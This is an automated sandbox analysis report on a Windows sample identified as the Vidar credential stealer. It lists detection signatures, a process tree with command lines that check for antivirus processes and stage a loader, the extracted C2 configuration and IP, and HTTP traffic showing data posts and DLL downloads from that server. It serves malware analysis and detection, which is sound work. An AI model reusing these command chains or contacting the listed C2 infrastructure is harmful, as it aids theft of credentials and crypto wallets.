Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1483134
MD5:1b0fe9739ef19752cb12647b6a4ba97b
SHA1:0672bbdf92feea7db8decb5934d921f8c47c3033
SHA256:151247e9379a755e3bb260cca5c59977e4075d5404db4198f3cec82818412479
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6112 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1B0FE9739EF19752CB12647B6A4BA97B)
    • cmd.exe (PID: 3704 cmdline: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3768 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1672 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2940 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5856 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4088 cmdline: cmd /c md 229536 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5500 cmdline: findstr /V "ReprintVerificationMercyRepository" Elliott MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4156 cmdline: cmd /c copy /b Exhibit + Rand + Hours 229536\U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Webster.pif (PID: 5740 cmdline: 229536\Webster.pif 229536\U MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
      • timeout.exe (PID: 1020 cmdline: timeout 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "1a72eb06939ea478753d5c4df4b2bd32"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.Webster.pif.47f0000.6.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                11.2.Webster.pif.1b4b810.5.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  11.2.Webster.pif.17ad098.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    11.2.Webster.pif.1b4b810.5.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      11.2.Webster.pif.17ad098.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

                        Sigma Signatures

                        Sigma detected: Execution of Suspicious File Type Extension
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 229536\Webster.pif 229536\U, CommandLine: 229536\Webster.pif 229536\U, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\229536\Webster.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3704, ParentProcessName: cmd.exe, ProcessCommandLine: 229536\Webster.pif 229536\U, ProcessId: 5740, ProcessName: Webster.pif
                        Sigma detected: Suspicious Copy From or To System Directory
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6112, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit, ProcessId: 3704, ProcessName: cmd.exe

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Sigma detected: Search for Antivirus process
                        Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3704, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 5856, ProcessName: findstr.exe

                        Snort Signatures

                        No Snort rule has matched

                        Suricata Signatures

                        Timestamp:2024-07-26T17:53:22.098195+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:49715
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T17:54:58.184294+0200
                        SID:2028765
                        Source Port:64186
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:45.026078+0200
                        SID:2011803
                        Source Port:443
                        Destination Port:64179
                        Protocol:TCP
                        Classtype:Executable code was detected
                        Timestamp:2024-07-26T17:54:29.091020+0200
                        SID:2049087
                        Source Port:64170
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T17:54:24.958434+0200
                        SID:2028765
                        Source Port:64168
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:32.339070+0200
                        SID:2028765
                        Source Port:64172
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:55:03.839325+0200
                        SID:2028765
                        Source Port:64189
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:28.443967+0200
                        SID:2028765
                        Source Port:64170
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:38.210507+0200
                        SID:2028765
                        Source Port:64175
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:32.999458+0200
                        SID:2051831
                        Source Port:443
                        Destination Port:64172
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-07-26T17:54:32.999290+0200
                        SID:2049087
                        Source Port:64172
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T17:54:26.883415+0200
                        SID:2028765
                        Source Port:64169
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:53:44.137634+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:64166
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T17:54:37.094243+0200
                        SID:2011803
                        Source Port:443
                        Destination Port:64174
                        Protocol:TCP
                        Classtype:Executable code was detected
                        Timestamp:2024-07-26T17:54:34.845731+0200
                        SID:2028765
                        Source Port:64173
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:44.185245+0200
                        SID:2028765
                        Source Port:64179
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:48.385165+0200
                        SID:2028765
                        Source Port:64181
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:39.270003+0200
                        SID:2028765
                        Source Port:64176
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:53:42.765660+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:64165
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T17:55:05.455054+0200
                        SID:2028765
                        Source Port:64190
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:46.289932+0200
                        SID:2028765
                        Source Port:64180
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:55:01.759091+0200
                        SID:2028765
                        Source Port:64188
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:55.817975+0200
                        SID:2028765
                        Source Port:64184
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:59.450351+0200
                        SID:2028765
                        Source Port:64187
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:35.007420+0200
                        SID:2028765
                        Source Port:64174
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:41.779288+0200
                        SID:2028765
                        Source Port:64178
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:40.682041+0200
                        SID:2028765
                        Source Port:64177
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:51.783629+0200
                        SID:2028765
                        Source Port:64183
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:56.797425+0200
                        SID:2028765
                        Source Port:64185
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:31.666423+0200
                        SID:2044247
                        Source Port:443
                        Destination Port:64171
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-07-26T17:54:29.989042+0200
                        SID:2028765
                        Source Port:64171
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T17:54:50.224091+0200
                        SID:2028765
                        Source Port:64182
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: https://5.75.212.60/sqls.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/msvcp140.dllGAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/erAvira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199747278259/badgesAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/-Avira URL Cloud: Label: malware
                        Source: https://5.75.212.60/)Avira URL Cloud: Label: malware
                        Source: https://t.me/armad2aAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/softokn3.dllNmAvira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199747278259Avira URL Cloud: Label: malware
                        Source: https://5.75.212.60/dfAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/bAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/eAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/DataAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/softokn3.dllAvira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199747278259/inventory/Avira URL Cloud: Label: malware
                        Source: https://5.75.212.60/mozglue.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/Avira URL Cloud: Label: malware
                        Source: https://5.75.212.60/msvcp140.dllHAAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/softokn3.dllIAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/freebl3.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/nss3.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/ts8Avira URL Cloud: Label: malware
                        Source: https://5.75.212.60/msvcp140.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/saenh.dllvAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "1a72eb06939ea478753d5c4df4b2bd32"}
                        Multi AV Scanner detection for submitted file
                        Source: file.exeReversingLabs: Detection: 29%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.6:64167 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:64168 version: TLS 1.2
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: Webster.pif, 0000000B.00000002.3346342228.000000006C8CD000.00000002.00000001.01000000.00000009.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                        Source: Binary string: freebl3.pdb source: Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: freebl3.pdbp source: Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: nss3.pdb@ source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: softokn3.pdb@ source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Webster.pif, 0000000B.00000002.3339217037.000000002B6B6000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Webster.pif, 0000000B.00000002.3334527572.000000001F7DA000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                        Source: Binary string: nss3.pdb source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: mozglue.pdb source: Webster.pif, 0000000B.00000002.3346342228.000000006C8CD000.00000002.00000001.01000000.00000009.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE4005
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00AE494A
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEC2FF
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00AECD9F
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AECD14 FindFirstFileW,FindClose,11_2_00AECD14
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF5D8
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF735
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEFA36
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE3CE2
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior

                        Networking

                        barindex
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199747278259
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 23.197.127.21 23.197.127.21
                        Source: Joe Sandbox ViewASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
                        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDAEBGCAAFIDGCGDHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 5105Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
